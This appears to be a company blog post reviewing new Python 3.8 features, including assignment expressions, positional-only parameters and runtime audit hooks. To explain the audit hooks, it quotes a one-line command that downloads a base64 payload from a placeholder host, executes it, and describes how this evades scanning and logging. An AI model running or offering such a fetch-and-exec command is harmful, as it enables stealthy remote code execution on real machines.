Python 3.8 what’s new and how to use it?

Aleksandr Dolgaryev

CTO

In this article, we will make an overview of new features in Python3.8.

Walrus operator (Assignment expressions)

We know that you’ve been waiting for a while for this. It goes back years to the moment when python deliberately prohibited using “=” as expression. Some people liked it as it helped not to confuse = and == in conditions and ‘with’ statement, but others found it to be inconvenient to either repeat a statement or to assign it to a variable. So let’s go to the example.

As Guido points our, most programmers tend to write:

group = re.match(data).group(1) if re.match(data) else None

instead of

match = re.match(data)
group = match.group(1) if match else None

that made the program slower. It’s quite reasonable why some programmers didn’t want to choose the first option as it clutters the code.

Now we have the option to do like that

group = match.group(1) if (match := re.match(data)) else None

Also, it’s quite useful in multiple if-cases not to compute everything beforehand

match1 = pattern1.match(data)
match2 = pattern2.match(data)
if match1:
    result = match1.group(1)
elif match2:
    result = match2.group(2)
else:
    result = None

instead of that, we can write

if (match1 := pattern1.match(data)):
    result = match1.group(1)
elif (match2 := pattern2.match(data)):
    result = match2.group(2)
else:
    result = None

what is more optimal as the second if won’t be computed if the first one is correct.

In general, I’m glad about this pep (pep-572) as it gives the non-existent possibility but also uses another sign for that, so it’s hard to confuse with ==

However, it presents some possibilities to produce initially invalid code

y0 = (y1 := f(x))

Positional-only parameters

def f(a, b, /, c, d, *, e, f):
    print(a, b, c, d, e, f)

anything before / is positional only
anything after * is a keyword only

f(10, 20, 30, d=40, e=50, f=60)     - valid
f(10, b=20, c=30, d=40, e=50, f=60) - b cannot be a keyword argument
f(10, 20, 30, 40, 50, f=60)         - e must be a keyword argument

The appliance of this feature can be explained in one sentence.

It’ll be easier for libraries to change their signatures. Let’s look at the example.

def add_to_queue(item: QueueItem):

now the author should maintain this signature, it’s not possible to change the name of the param anymore as it will be a breakable change. Imagine that now you want to have not only one item but either one or list of them

def add_to_queue(items: Union[QueueItem, List[QueueItem]]):

or like so

def add_to_queue(*items: QueueItem):

this is something that you couldn’t do before due to compatibility with the previous version. And now you can. As well as that, it’s more consistent with the builtins that already use such an approach. For instance, you can’t pass kwargs to pow function.

>>> help(pow)
...
pow(x, y, z=None, /)
...
>>> pow(x=5, y=3)Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: pow() takes no keyword arguments

f-strings debug support

A small additional feature helps us to use a concise format to write “name_of_variable=”, variable.

f"{chr(65) = }" => "chr(65) = 'A'"

did you notice = after chr(65)? this does the trick. It helps as to provide a short way of printing variables using f-strings

Native asyncio shell

Now if we run python shell-like ‘python -m asyncio’, we no longer need asyncio.run() to run async functions. await can be used directly from the shell.

>python -m asyncio
asyncio REPL 3.8.0b4
Use “await” directly instead of “asyncio.run()”.
Type “help”, “copyright”, “credits” or “license” for more information.

>>> import asyncio
>>> async def test():
… await asyncio.sleep(1)
… return ‘hello’
…
>>> await test()
‘hello’

Python runtime audit hooks

Python runtime relies heavily on C. However, the code that executed there is not logged or tracked in any other way. It hampers different test frameworks, logging frameworks, and security tools to monitor and optionally limit actions taken by the runtime.

Now, the events produced by the runtime execution can be watched, including module import system and any custom hooks.

The new API will look like the following

# Add an auditing hook
sys.addaudithook(hook: Callable[[str, tuple]])
# Raise an event with all auditing hooks
sys.audit(str, *args)

Hooks cannot be removed or replaced. For CPython, hooks added from C are global, while hooks added from Python are only for the current interpreter. Global hooks are executed before interpreter hooks.

One of particularly interesting and mostly untraceable exploit is write something like this:

python -c “import urllib.request, base64;
    exec(base64.b64decode(
        urllib.request.urlopen(‘http://my-exploit/py.b64')
    ).decode())”

Such code is not scanned by most anti-malware programs as that relies on recognizable code being read through downloading or writing to a disk and base64 is enough to bypass this. It also goes through protections such as file access control lists or permissions (no file access occurs), approved application lists (assuming Python has been approved for other uses), and automated auditing or logging (assuming Python is allowed to access the internet or access another machine on the local network from which to obtain its payload).

With runtime event hooks we can decide how to react to any specific event. We can either log the event or just abort the operation fully.

multiprocessing.shared_memory

It helps to use the same memory area from different processes/interpreters. It can help us reduce the time spent on serializing objects to transfer them between processes. Instead of serializing it, sending it to a queue and deserializing, we can just use shared memory from a different process.

Pickle protocol 5 with out-of-band data buffers

The pickle protocol 5 introduces support for out-of-band buffers where data can be transmitted separately from the main pickle stream, at the discretion of the communication layer.

The previous 2 amendments are quite important for the following one. Unfortunately, it hasn’t been included in Python3.8 as some work with merging old code is still to be done, but it can change our approaches to parallel code in Python.

Sub-interpreters

Python threads do not run in parallel due to GIL, whereas processes are resource consuming. It takes 100–200ms to start a process as well as they use a big amount of RAM. One of the things that can leverage it is sub-interpreters. GIL is per interpreter, so it’s not gonna affect other interpreters and Starting it is lighter than starting a process (though, still slower than launching a thread).

The main arising problem is to transfer the data between the interpreters as they will not share they state as threads do. So we need to use some sort of communication between them. Pickle, marshal or JSON can be used for serializing and deserializing the objects but it may be quite slow. One of the solutions is to use shared memory from the processes module.

The sub-processes seem to be a solution to long-lasting GIL problems, however, there is still some work to be done. Python still uses “Runtime State” instead of the “Interpreter State” in some cases. For example, the garbage collector acts that way. So we need to change as well as many other inner modules to start using sub-interpreters.

I hope the feature will be released in Python3.9

In conclusion, there is some nice syntactic sugar added to the version as well as more serious amendments to the core libraries and runtime process. There are still many cool features that didn’t get into the release, so we’ll wait for them in Python3.9. Stay tuned and follow our blog updates.